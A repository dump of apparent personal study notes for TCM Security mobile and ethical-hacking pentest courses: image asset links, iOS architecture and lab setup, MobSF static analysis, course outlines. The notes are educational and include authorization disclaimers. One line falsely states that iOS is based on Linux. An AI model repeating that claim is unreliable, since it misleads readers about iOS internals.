https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/6-android-bonus/.gitbook/assets/2024-01-10_00-35-15_361.png -------------------------------------------------------------------------------- /mapt/6-android-bonus/.gitbook/assets/2024-01-10_00-38-03_362.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/6-android-bonus/.gitbook/assets/2024-01-10_00-38-03_362.png -------------------------------------------------------------------------------- /mapt/6-android-bonus/.gitbook/assets/2024-01-10_00-39-25_363.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/6-android-bonus/.gitbook/assets/2024-01-10_00-39-25_363.png -------------------------------------------------------------------------------- /mapt/6-android-bonus/.gitbook/assets/2024-01-21_12-46-46_371.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/6-android-bonus/.gitbook/assets/2024-01-21_12-46-46_371.png -------------------------------------------------------------------------------- /mapt/6-android-bonus/.gitbook/assets/2024-01-21_13-13-40_372.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/6-android-bonus/.gitbook/assets/2024-01-21_13-13-40_372.png -------------------------------------------------------------------------------- /mapt/7-ios/.gitbook/assets/ios-logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/7-ios/.gitbook/assets/ios-logo.png -------------------------------------------------------------------------------- /mapt/7-ios/.gitbook/assets/ios-sec-architecture.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/7-ios/.gitbook/assets/ios-sec-architecture.png -------------------------------------------------------------------------------- /mapt/7-ios/README.md: -------------------------------------------------------------------------------- 1 | # 7. iOS Security 2 | 3 | ![](.gitbook/assets/ios-logo.png) 4 | 5 | iOS devices have limitations compared to Android and include a hardware security component. Jailbreaking may be required to install third-party apps (sideloading). 6 | 7 | ## iOS Architecture 8 | 9 | [Apple iOS Security](https://support.apple.com/guide/security/welcome/web) is based on a hardware and a software layer, and iOS **is based on the Linux O.S**. 10 | 11 | - All apps are signed by Apple (with a developer profile) - Free developer account allows Sideloading. 12 | - 2 partitions on the file system (user and O.S. partitions) - the user can only see user's file 13 | - Each iOS device has a device and a group key, created during manufacturing 14 | - iOS utilizes secure boot chain, Touch ID/Face ID, and the Secure Enclave for hardware-based encryption and key management. 15 | 16 | [**iOS Architecture**](https://mas.owasp.org/MASTG/iOS/0x06a-Platform-Overview/#ios-security-architecture) 17 | 18 | ![iOS Security Architecture](.gitbook/assets/ios-sec-architecture.png) 19 | 20 | Most iOS Applications are based on native [Objective C](https://developer.apple.com/library/archive/documentation/Cocoa/Conceptual/ProgrammingWithObjectiveC/Introduction/Introduction.html#//apple_ref/doc/uid/TP40011210-CH1-SW1), and [Swift](https://developer.apple.com/swift/resources/). 21 | 22 | - Developed in [Xcode](https://developer.apple.com/xcode/) environment 23 | - `.iPA` format - signed bundle of folders and assets 24 | - Unzipping .iPA results into a `/Payload` folder 25 | - `Application.app` 26 | - `iTunesMetadata.plist` 27 | - `Info.plist` 28 | - various unique `.json`, assets, resources 29 | 30 | ------ 31 | 32 | -------------------------------------------------------------------------------- /mapt/8-ios-lab/.gitbook/assets/2024-02-24_20-00-26_419.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/8-ios-lab/.gitbook/assets/2024-02-24_20-00-26_419.png -------------------------------------------------------------------------------- /mapt/8-ios-lab/.gitbook/assets/2024-02-24_20-12-01_420.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/8-ios-lab/.gitbook/assets/2024-02-24_20-12-01_420.png -------------------------------------------------------------------------------- /mapt/8-ios-lab/README.md: -------------------------------------------------------------------------------- 1 | # 8. iOS Lab Setup 2 | 3 | > ❗ A MacOS device is required for the lab setup and pentesting, while whenever feasible, both static and dynamic analyses in the course will be conducted using the [Kali VM](../3-android-lab/README.md). 4 | 5 | Open Mac App Store and install [Xcode](https://developer.apple.com/documentation/xcode) 6 | 7 | ![](.gitbook/assets/2024-02-24_20-00-26_419.png) 8 | 9 | With the Xcode project, source code can be analyzed 10 | - Xcode Simulator can be used to run the app 11 | 12 | Create an [Apple Developer](https://developer.apple.com/programs/) account and **configure it in Xcode Accounts to manage certificates for app signing** 13 | 14 | Tools such as [AnyTrans](https://www.imobie.com/anytrans/) or [iMazing](https://imazing.com/) (suggested) can be used to pull apps from the App Store and export `.ipa` apps 15 | 16 | ![iMazing](.gitbook/assets/2024-02-24_20-12-01_420.png) 17 | 18 | Homebrew is necessary to install some MacOS based tools 19 | 20 | - **Install [Homebrew](https://brew.sh/) in Linux** 21 | 22 | ```bash 23 | sudo apt install -y build-essential procps curl file git 24 | 25 | /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" 26 | 27 | test -d ~/.linuxbrew && eval "$(~/.linuxbrew/bin/brew shellenv)" 28 | test -d /home/linuxbrew/.linuxbrew && eval "$(/home/linuxbrew/.linuxbrew/bin/brew shellenv)" 29 | echo "eval \"\$($(brew --prefix)/bin/brew shellenv)\"" >> ~/.zshrc 30 | ``` 31 | 32 | - [IPATool](https://github.com/majd/ipatool) - *Command-line tool that allows searching and downloading app packages (known as ipa files) from the iOS App Store* 33 | 34 | ```bash 35 | brew tap majd/repo 36 | brew install ipatool 37 | 38 | ipatool auth login -e 39 | ipatool search 40 | ipatool download --bundle-identifier 41 | # .ipa is downloaded 42 | ``` 43 | 44 | Paid emulator tools 45 | - [Corellium Virtual Hardware](https://www.corellium.com/) 46 | - [Appetize.io](https://appetize.io/) 47 | 48 | ------ 49 | 50 | -------------------------------------------------------------------------------- /mapt/9-ios-static/.gitbook/assets/2024-02-25_00-38-23_421.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/9-ios-static/.gitbook/assets/2024-02-25_00-38-23_421.png -------------------------------------------------------------------------------- /mapt/9-ios-static/.gitbook/assets/2024-02-25_00-47-43_422.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/9-ios-static/.gitbook/assets/2024-02-25_00-47-43_422.png -------------------------------------------------------------------------------- /mapt/9-ios-static/.gitbook/assets/2024-02-25_00-48-49_423.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/9-ios-static/.gitbook/assets/2024-02-25_00-48-49_423.png -------------------------------------------------------------------------------- /mapt/9-ios-static/.gitbook/assets/2024-02-25_01-25-16_424.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/9-ios-static/.gitbook/assets/2024-02-25_01-25-16_424.png -------------------------------------------------------------------------------- /mapt/9-ios-static/.gitbook/assets/2024-02-25_01-28-44_425.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/9-ios-static/.gitbook/assets/2024-02-25_01-28-44_425.png -------------------------------------------------------------------------------- /mapt/9-ios-static/.gitbook/assets/2024-02-25_01-29-28_426.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/9-ios-static/.gitbook/assets/2024-02-25_01-29-28_426.png -------------------------------------------------------------------------------- /mapt/9-ios-static/.gitbook/assets/2024-02-25_01-31-45_427.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/9-ios-static/.gitbook/assets/2024-02-25_01-31-45_427.png -------------------------------------------------------------------------------- /mapt/9-ios-static/.gitbook/assets/2024-02-25_01-36-57_428.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/mapt/9-ios-static/.gitbook/assets/2024-02-25_01-36-57_428.png -------------------------------------------------------------------------------- /mapt/9-ios-static/README.md: -------------------------------------------------------------------------------- 1 | # 9. iOS Static Analysis 2 | 3 | > ❗ Always refer to a HackerOne Bug Bounty program to find valid targets 4 | > 5 | > 🔗 [HackerOne iOS programs](https://hackerone.com/opportunities/all/search?asset_types=APPLE_STORE_APP_ID%2CTESTFLIGHT%2COTHER_IPA&ordering=Newest+programs) 6 | > 7 | > - 🧪 `e.g.` - [1.1.1.1 - com.cloudflare.1dot1dot1dot1](https://hackerone.com/cloudflare) Cloudflare iOS is in scope 8 | 9 | Unzip the `.ipa` file and check the various files inside it 10 | - Inside the `Payload` folder check for `plist` files, `Framekworks` folder for app's source code, other `json` files on different folders 11 | - Check for hardcoded strings in the files. 12 | 13 | ![](.gitbook/assets/2024-02-25_00-38-23_421.png) 14 | 15 | ![](.gitbook/assets/2024-02-25_00-47-43_422.png) 16 | 17 | ![Info.plist](.gitbook/assets/2024-02-25_00-48-49_423.png) 18 | 19 | Run MobSF and import the `.ipa` file into it for local static analysis 20 | - Check the sections, look for different files, strings and look through interesting information about the app 21 | 22 | ![MobSF - 1.1.1.1.ipa](.gitbook/assets/2024-02-25_01-25-16_424.png) 23 | 24 | ![MobSF Application Security Scorecard - 1.1.1.1 6.23](.gitbook/assets/2024-02-25_01-36-57_428.png) 25 | 26 | ![](.gitbook/assets/2024-02-25_01-28-44_425.png) 27 | 28 | ![](.gitbook/assets/2024-02-25_01-29-28_426.png) 29 | 30 | ![](.gitbook/assets/2024-02-25_01-31-45_427.png) 31 | 32 | ------ 33 | 34 | -------------------------------------------------------------------------------- /mapt/README.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: Mobile Application Penetration Testing by Aaron Wilson 3 | 4 | --- 5 | 6 | # TCM - Mobile Application Penetration Testing 7 | 8 | ![Mobile Application Penetration Testing - academy.tcm-sec.com - © TCM Security](.gitbook/assets/mapt.png) 9 | 10 | ## [MAPT](https://academy.tcm-sec.com/p/mobile-application-penetration-testing) Course Goals and Objectives 11 | 12 | * Learn Android and iOS Mobile Application penetration testing 13 | * Setting up iOS and Android lab environments 14 | * Manual Analysis for sensitive data 15 | * Automated Analysis with MobSF 16 | * Bypassing SSL Pinning with Objection and Frida 17 | * OWASP Mobile Top Ten 18 | * iOS Jailbreaking 19 | 20 | ## Course duration & Topics 21 | 22 | ~ 9 hours 23 | 24 | 1. [Introduction & Mobile Pentesting](1-intro/README.md) 25 | 2. [Android Security](2-android/README.md) 26 | 3. [Android Lab Setup](3-android-lab/README.md) 27 | 4. [Android Static Analysis](4-android-static/README.md) 28 | 5. [Android Dynamic Analysis](5-android-dynamic/README.md) 29 | 6. [Android Bug Bounty](6-android-bonus/README.md) 30 | 7. [iOS Security](7-ios/README.md) 31 | 8. [iOS Lab Setup](8-ios-lab/README.md) 32 | 9. [iOS Static Analysis](9-ios-static/README.md) 33 | 10. [iOS Dynamic Analysis](10-ios-dynamic/README.md) 34 | 11. [iOS Bug Bounty](11-ios-bonus/README.md) 35 | 36 | Instructor: [Aaron Wilson](https://www.linkedin.com/in/wilson-security/overlay/about-this-profile/) 37 | 38 | ## Useful links and resources 39 | 40 | * Where to find the [Mobile Application Penetration Testing](https://academy.tcm-sec.com/p/mobile-application-penetration-testing) course? - [TCM Academy Courses](https://academy.tcm-sec.com/courses) 41 | * TCM discord channel - [TCM Security Discord](https://discord.gg/tcm) 42 | * 🔬 For the **training** part I will use my home lab environment and 43 | * Rooted physical Android phone 44 | * Jailbroken physical iPhone 45 | 46 | * [My MAPT references](mapt-references.md) 47 | 48 | > ### ❗ Disclaimer 49 | > 50 | > * **Do not use the covered attacks and techniques on real Mobile Applications, IP addresses, hosts or networks without proper authorization!** 51 | 52 | --- 53 | 54 | -------------------------------------------------------------------------------- /peh/.gitbook/assets/peh.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/.gitbook/assets/peh.png -------------------------------------------------------------------------------- /peh/1-intro/.gitbook/assets/2023-06-13_13-16-35_56.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/1-intro/.gitbook/assets/2023-06-13_13-16-35_56.png -------------------------------------------------------------------------------- /peh/1-intro/.gitbook/assets/LayersofOSI1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/1-intro/.gitbook/assets/LayersofOSI1.png -------------------------------------------------------------------------------- /peh/1-intro/.gitbook/assets/original-seven-layers-of-osi-model.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/1-intro/.gitbook/assets/original-seven-layers-of-osi-model.png -------------------------------------------------------------------------------- /peh/1-intro/.gitbook/assets/osi-attacks.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/1-intro/.gitbook/assets/osi-attacks.png -------------------------------------------------------------------------------- /peh/2-lab/.gitbook/assets/2023-06-13_15-31-52_57.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/2-lab/.gitbook/assets/2023-06-13_15-31-52_57.png -------------------------------------------------------------------------------- /peh/2-lab/.gitbook/assets/2023-06-13_15-34-48_58.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/2-lab/.gitbook/assets/2023-06-13_15-34-48_58.png -------------------------------------------------------------------------------- /peh/2-lab/.gitbook/assets/2023-06-13_16-12-41_60.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/2-lab/.gitbook/assets/2023-06-13_16-12-41_60.png -------------------------------------------------------------------------------- /peh/2-lab/.gitbook/assets/2023-06-13_16-13-44_61.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/2-lab/.gitbook/assets/2023-06-13_16-13-44_61.png -------------------------------------------------------------------------------- /peh/2-lab/.gitbook/assets/2023-06-13_16-18-52_62.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/2-lab/.gitbook/assets/2023-06-13_16-18-52_62.png -------------------------------------------------------------------------------- /peh/2-lab/.gitbook/assets/2023-06-13_16-29-12_63.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/2-lab/.gitbook/assets/2023-06-13_16-29-12_63.png -------------------------------------------------------------------------------- /peh/2-lab/.gitbook/assets/2023-06-13_16-31-48_64.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/2-lab/.gitbook/assets/2023-06-13_16-31-48_64.png -------------------------------------------------------------------------------- /peh/2-lab/.gitbook/assets/2023-06-13_16-45-36_65.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/2-lab/.gitbook/assets/2023-06-13_16-45-36_65.png -------------------------------------------------------------------------------- /peh/2-lab/.gitbook/assets/2023-06-20_13-53-15_93.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/2-lab/.gitbook/assets/2023-06-20_13-53-15_93.png -------------------------------------------------------------------------------- /peh/2-lab/.gitbook/assets/2023-06-20_15-43-49_94.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/2-lab/.gitbook/assets/2023-06-20_15-43-49_94.png -------------------------------------------------------------------------------- /peh/2-lab/.gitbook/assets/2023-06-27_19-33-02_117.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/2-lab/.gitbook/assets/2023-06-27_19-33-02_117.png -------------------------------------------------------------------------------- /peh/2-lab/.gitbook/assets/2023-06-27_20-09-27_118.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/2-lab/.gitbook/assets/2023-06-27_20-09-27_118.png -------------------------------------------------------------------------------- /peh/2-lab/.gitbook/assets/2023-06-27_20-37-26_121.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/2-lab/.gitbook/assets/2023-06-27_20-37-26_121.png -------------------------------------------------------------------------------- /peh/2-lab/.gitbook/assets/2023-06-28_00-16-16_122.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/2-lab/.gitbook/assets/2023-06-28_00-16-16_122.png -------------------------------------------------------------------------------- /peh/2-lab/.gitbook/assets/2023-06-28_00-17-23_123.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/2-lab/.gitbook/assets/2023-06-28_00-17-23_123.png -------------------------------------------------------------------------------- /peh/2-lab/.gitbook/assets/2023-07-01_19-37-07_128.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/2-lab/.gitbook/assets/2023-07-01_19-37-07_128.png -------------------------------------------------------------------------------- /peh/2-lab/.gitbook/assets/2023-07-01_20-20-58_129.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/2-lab/.gitbook/assets/2023-07-01_20-20-58_129.png -------------------------------------------------------------------------------- /peh/2-lab/.gitbook/assets/2023-07-01_20-38-59_131.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/2-lab/.gitbook/assets/2023-07-01_20-38-59_131.png -------------------------------------------------------------------------------- /peh/2-lab/.gitbook/assets/2023-07-03_10-54-56_141.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/2-lab/.gitbook/assets/2023-07-03_10-54-56_141.png -------------------------------------------------------------------------------- /peh/2-lab/.gitbook/assets/2023-07-03_10-55-13_142.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/2-lab/.gitbook/assets/2023-07-03_10-55-13_142.png -------------------------------------------------------------------------------- /peh/2-lab/.gitbook/assets/2023-07-03_11-25-49_144.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/2-lab/.gitbook/assets/2023-07-03_11-25-49_144.png -------------------------------------------------------------------------------- /peh/2-lab/.gitbook/assets/2023-07-03_11-35-32_145.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/2-lab/.gitbook/assets/2023-07-03_11-35-32_145.png -------------------------------------------------------------------------------- /peh/2-lab/.gitbook/assets/2023-07-04_17-08-01_151.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/2-lab/.gitbook/assets/2023-07-04_17-08-01_151.png -------------------------------------------------------------------------------- /peh/2-lab/.gitbook/assets/2023-07-04_17-14-16_152.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/2-lab/.gitbook/assets/2023-07-04_17-14-16_152.png -------------------------------------------------------------------------------- /peh/2-lab/.gitbook/assets/2024-06-29_15-22-24_524.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/2-lab/.gitbook/assets/2024-06-29_15-22-24_524.png -------------------------------------------------------------------------------- /peh/2-lab/.gitbook/assets/2024-06-29_15-49-25_525.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/2-lab/.gitbook/assets/2024-06-29_15-49-25_525.png -------------------------------------------------------------------------------- /peh/2-lab/.gitbook/assets/2024-06-29_16-20-39_526.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/2-lab/.gitbook/assets/2024-06-29_16-20-39_526.png -------------------------------------------------------------------------------- /peh/2-lab/.gitbook/assets/2024-06-29_16-24-10_527.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/2-lab/.gitbook/assets/2024-06-29_16-24-10_527.png -------------------------------------------------------------------------------- /peh/2-lab/.gitbook/assets/2024-06-29_16-27-44_528.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/2-lab/.gitbook/assets/2024-06-29_16-27-44_528.png -------------------------------------------------------------------------------- /peh/2-lab/.gitbook/assets/2024-06-29_17-45-17_530.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/2-lab/.gitbook/assets/2024-06-29_17-45-17_530.png -------------------------------------------------------------------------------- /peh/2-lab/README.md: -------------------------------------------------------------------------------- 1 | # 2. Lab Set Up, Linux & Python 2 | 3 | --- 4 | 5 | ## Lab Set Up 6 | 7 | > **Virtualizers** 8 | > 9 | > 🔗 [VMware Workstation Player](https://www.vmware.com/products/workstation-player/workstation-player-evaluation.html) 10 | > 11 | > 🔗 [VMWare Workstation Pro (Free)](https://support.broadcom.com/group/ecx/productdownloads?subfamily=VMware%20Workstation%20Pro) 12 | > 13 | > 🔗 [VirtualBox + VirtualBox Extension Pack](https://www.virtualbox.org/wiki/Downloads) 14 | > 15 | > **O.S.** 16 | > 17 | > 🔗 [Kali Linux](https://www.kali.org/) / [ParrotOS](https://www.parrotsec.org/) 18 | > 19 | > - [My Kali VM Installation - VMware](https://blog.syselement.com/home/operating-systems/linux/distros/kali-vm) 20 | > - [My Ubuntu VM Installation - VirtualBox](https://blog.syselement.com/tcm/courses/linux-101/1-linux-distributions/installing-linux) 21 | 22 | 1. Install a Virtualizer Software (VMware / VirtualBox) 23 | 24 | 2. Configure a Virtual Machine with **`Kali Linux`** O.S. (check above links) 25 | 26 | - [Kali Virtual Machines](https://www.kali.org/get-kali/#kali-virtual-machines) are ready to go VMs. 27 | - Kali Linux is a Debian-based Linux distribution 28 | 29 | > ❗ **Use it responsibly, ethically and with proper authorization for security testing!** 30 | > 31 | 32 | --- 33 | 34 | ## Sections 35 | 36 | 1. [Intro to Kali Linux](kali-linux.md) 37 | 2. [Intro to Python](python.md) 38 | 39 | ------ 40 | 41 | -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-02_20-03-06_537.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-02_20-03-06_537.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-02_20-30-23_539.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-02_20-30-23_539.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-02_23-58-39_542.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-02_23-58-39_542.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-03_00-09-39_543.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-03_00-09-39_543.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-03_00-12-42_544.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-03_00-12-42_544.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-03_19-54-58_561.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-03_19-54-58_561.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-03_20-14-16_570.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-03_20-14-16_570.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-03_20-17-06_571.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-03_20-17-06_571.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-03_20-25-14_572.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-03_20-25-14_572.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-03_23-06-45_573.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-03_23-06-45_573.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-03_23-10-03_575.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-03_23-10-03_575.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-07_14-34-14_581-1720355665903-3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-07_14-34-14_581-1720355665903-3.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-07_14-35-03_582.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-07_14-35-03_582.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-07_14-38-22_583.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-07_14-38-22_583.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-11_08-02-01_590.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/3-eth-hack/.gitbook/assets/2024-07-11_08-02-01_590.png -------------------------------------------------------------------------------- /peh/3-eth-hack/.gitbook/assets/2024-07-11_08-06-15_591.png: -------------------------------------------------------------------------------- 